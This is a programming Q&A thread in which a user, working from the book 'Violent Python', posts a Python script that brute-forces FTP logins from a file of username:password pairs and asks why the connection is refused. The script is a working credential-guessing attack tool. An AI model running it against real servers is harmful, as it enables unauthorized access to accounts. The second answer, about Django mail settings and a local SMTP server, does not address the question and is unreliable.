# WinError 10061 - Target machine refused connection?

Tags: python, ftp

I was running this code:

```
import ftplib 

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    ftp = ftplib.FTP(hostname)

    for line in pF.readlines():
        userName, passWord = line.split(':', 1)  
        passWord = passWord.strip('\r\n')  # strip any of the two characters
        print("[+] Trying: {}/{}".format(userName, passWord))

        try:
            ftp.login(userName, passWord)
        except ftplib.error_perm:
            continue
        else:
            print('\n[*] {} FTP Logon Succeeded: {}/{}'.format(hostname, userName, passWord)) 
        ftp.quit()
        return userName, passWord

    print('\n[-] Could not brute force FTP credentials.') 
    return None, None

host = '192.168.95.179'
passwdFile = 'C:/Users/Karrigan/Documents/Python Stuff/userpass.txt' 
bruteLogin(host, passwdFile)
```

And I got an error:

```
[WinError 10061] No connection could be made because the target machine actively refused it
```

However, when running a similar version of this code earlier this morning, this error did not occur, but that might not be relevant.  What could cause this? (Also, that IP is an example provided from the book Violent Python)

Answer (score 2):

Generally that error message means you're getting blocked by a firewall, or the target machine isn't listening on that port.

So, if it was working earlier, then either someone turned on a firewall or stopped the process listening on that port.

Answer (score 0):

This is because you are trying to send email using your localhost as mail-server.
In development process and if you do not have a mail server setup, and you want to fake sending emails using your local machine, so you have to fake it.

In other words:

Looks like you are trying to send a mail (send_mail()) and your mail settings in your settings.py are not correct.

For debugging purposes you could setup a local smtpserver with this command:

```
python -m smtpd -n -c DebuggingServer localhost:1025
```

and adjust your mail settings accordingly:

```
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
```